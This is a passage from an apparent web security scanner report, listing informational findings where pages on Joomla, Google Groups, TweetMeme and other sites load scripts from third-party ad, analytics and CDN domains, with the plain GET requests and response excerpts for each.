21.196. http://extensions.joomla.org/extensions/languages/translations-for-joomla previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/extensions/languages/translations-for-joomla

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /extensions/languages/translations-for-joomla HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=119690ae64f99e48cab89680209b4270; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 72889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.197. http://extensions.joomla.org/extensions/new previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/extensions/new

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /extensions/new HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=bd83a0d831a42c661eb59a60c147c8f6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.198. http://flowplayer.org/tools/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://flowplayer.org
Path:	/tools/

Issue detail

The response dynamically includes the following script from another domain:

http://cdn.jquerytools.org/1.2.5/full/jquery.tools.min.js?foo

Request

GET /tools/ HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 24 Jan 2011 15:11:51 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Vary: Accept-Encoding
Content-Length: 13114

   <!DOCTYPE html>


<!--
   Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen

   Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/global-0.52.css?foo" />

                           <script src="http://cdn.jquerytools.org/1.2.5/full/jquery.tools.min.js?foo"></script>
...[SNIP]...

21.199. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The response dynamically includes the following script from another domain:

http://cti.w55c.net/ct/ct-b0e2fed435e243e8a8a841e55341dc2d.js?

Request

Response

21.200. http://flybase.org/reports/FBgn0000146.html/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://flybase.org
Path:	/reports/FBgn0000146.html/x22

Issue detail

The response dynamically includes the following script from another domain:

http://static.getclicky.com/js

Request

GET /reports/FBgn0000146.html/x22 HTTP/1.1
Host: flybase.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.201. http://forum.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.joomla.org
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en

Request

GET / HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:53 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:53 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=3b5661e788faab67f2027dc376b326d5; expires=Tue, 24-Jan-2012 15:11:53 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 103386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en"></script>
...[SNIP]...

21.202. http://forum.joomla.org/ucp.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.joomla.org
Path:	/ucp.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en

Request

GET /ucp.php?mode=register HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.203. http://forum.joomla.org/viewforum.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.joomla.org
Path:	/viewforum.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en

Request

GET /viewforum.php HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.204. http://forum.joomla.org/viewtopic.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.joomla.org
Path:	/viewtopic.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en

Request

GET /viewtopic.php HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.205. http://gegnia.com/joomla/informacion/mbrriti-joomla-1-pik-6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gegnia.com
Path:	/joomla/informacion/mbrriti-joomla-1-pik-6

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.statcounter.com/counter/counter_xhtml.js

Request

GET /joomla/informacion/mbrriti-joomla-1-pik-6 HTTP/1.1
Host: gegnia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:50 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 22bae4d6bb8978acd20b7a9dac0f3f85=ovtfp6obggr08kcq0mtis1qq55; path=/
Last-Modified: Mon, 24 Jan 2011 15:11:50 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sq-al" lang="sq-al" dir=
...[SNIP]...
</script>

<script type="text/javascript"

src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>

<script type="text/javascript"

src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter_xhtml.js"></script>
...[SNIP]...

21.206. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js

Request

Response

21.207. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js

Request

Response

21.208. http://green.autobytel.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://green.autobytel.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.home/hybr;abr=!ie;kw=hybr;info=27696;u=|||45B1051A-C3B3-0EF2-D7DB92DCE61CE4CF|||27696|||;sz=597x90;ord=52541936?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://www.bkrtx.com/js/bk-static.js

Request

GET / HTTP/1.1
Host: green.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: cweb=JONQJVS10.4.128.192CKMMI; path=/
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: USER_UUID_VCH=45B1050B%2DCA19%2DA839%2DE9A7BDE5F665AC56;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2014%3A35%3A00%27%7D;path=/
Set-Cookie: COUNT=1;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2018%3A36%3A00%27%7D;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
Set-Cookie: ID=27696%3Bhybd;path=/
Set-Cookie: HOMEVERSION=2;path=/
Date: Mon, 24 Jan 2011 22:36:00 GMT
Connection: close
Content-Length: 31347



<html>

<head>

<title>New Cars | Used Cars for Sale | New and Used Car Prices</title>



<meta name="description" content="New cars, used cars: prices
...[SNIP]...
27696;u=|||45B1051A-C3B3-0EF2-D7DB92DCE61CE4CF|||27696|||;sz=586x90;ord=52541936?" name="frame1" width="586" height="93" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no">
       <script language="Javascript1.1" SRC="http://ad.doubleclick.net/adj/abtl.home/hybr;abr=!ie;kw=hybr;info=27696;u=|||45B1051A-C3B3-0EF2-D7DB92DCE61CE4CF|||27696|||;sz=597x90;ord=52541936?">
       </script>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...

21.209. http://groups.google.com/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /group/alt.slack/msg/fa1fe1e3e6c31c9b/x22 HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.210. http://groups.google.com/group/joomla-commits/topics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/group/joomla-commits/topics

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /group/joomla-commits/topics HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.211. http://groups.google.com/group/joomla-dev-framework previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/group/joomla-dev-framework

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /group/joomla-dev-framework HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.212. http://groups.google.com/group/joomla-dev-general previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/group/joomla-dev-general

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /group/joomla-dev-general HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Jan 2011 22:35:58 GMT
Expires: Mon, 24 Jan 2011 22:35:58 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

21.213. http://groups.google.com/group/joomlabugsquad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/group/joomlabugsquad

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /group/joomlabugsquad HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Jan 2011 22:36:57 GMT
Expires: Mon, 24 Jan 2011 22:36:57 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

21.214. http://groups.google.com/grphp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/grphp

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.215. http://hairmakeup.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hairmakeup.tweetmeme.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: hairmakeup.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.216. http://help.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js

Request

GET / HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=jcahvhmi593kcks9omcs8qbp63; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<link rel="stylesheet" href="http://help.tweetmeme.com/wp-content/themes/wiki/style.css" type="text/css" media="screen" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.217. http://help.tweetmeme.com/2009/04/07/api-documentation/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/2009/04/07/api-documentation/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js

Request

GET /2009/04/07/api-documentation/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:01:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=fri7ds4g5e569ab52b67udmd34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<link rel="stylesheet" href="http://help.tweetmeme.com/wp-content/themes/wiki/style.css" type="text/css" media="screen" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.218. http://help.tweetmeme.com/2009/04/09/rss-feeds/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/2009/04/09/rss-feeds/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js

Request

GET /2009/04/09/rss-feeds/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:01:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=dea45f6dnud0kld58ppcjlmap1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<link rel="stylesheet" href="http://help.tweetmeme.com/wp-content/themes/wiki/style.css" type="text/css" media="screen" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.219. http://help.tweetmeme.com/2009/04/09/twitter-feeds/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/2009/04/09/twitter-feeds/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js

Request

GET /2009/04/09/twitter-feeds/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6fjaaa6od3bhvj75ou4s3p06f2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<link rel="stylesheet" href="http://help.tweetmeme.com/wp-content/themes/wiki/style.css" type="text/css" media="screen" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.220. http://help.tweetmeme.com/contact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/contact/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js

Request

GET /contact/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=p918mp9o4urak293n2lk14io61; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<link rel="stylesheet" href="http://help.tweetmeme.com/wp-content/themes/wiki/style.css" type="text/css" media="screen" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.221. http://help.tweetmeme.com/language/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/language/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js

Request

GET /language/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=evippa6a47912f617v4ke1qlu5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<link rel="stylesheet" href="http://help.tweetmeme.com/wp-content/themes/wiki/style.css" type="text/css" media="screen" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.222. http://home.big.jp/flets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.big.jp
Path:	/flets/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /flets/ HTTP/1.1
Host: home.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:36:22 GMT
Server: Apache/1.3.33 (Unix) PHP/4.3.10
X-Powered-By: PHP/4.3.10
Connection: close
Content-Type: text/html; charset=Shift_JIS
Content-Length: 20938

<HTML>
<HEAD>
<Title>.t...b.cADSL....B.t...b.c../.l.N.X.g/.v...~.A...... | Amusement BiG-NET http://home.big.jp/flets/</Title><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=x-sjis">
<Meta
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.223. http://howto.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://howto.tweetmeme.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: howto.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.224. http://investor.autobytel.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investor.autobytel.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://www.bkrtx.com/js/bk-static.js

Request

GET / HTTP/1.1
Host: investor.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.225. http://iphone.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://iphone.tweetmeme.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: iphone.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.226. http://it.toolbox.com/blogs/database-soup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/database-soup

Issue detail

The response dynamically includes the following scripts from other domains:

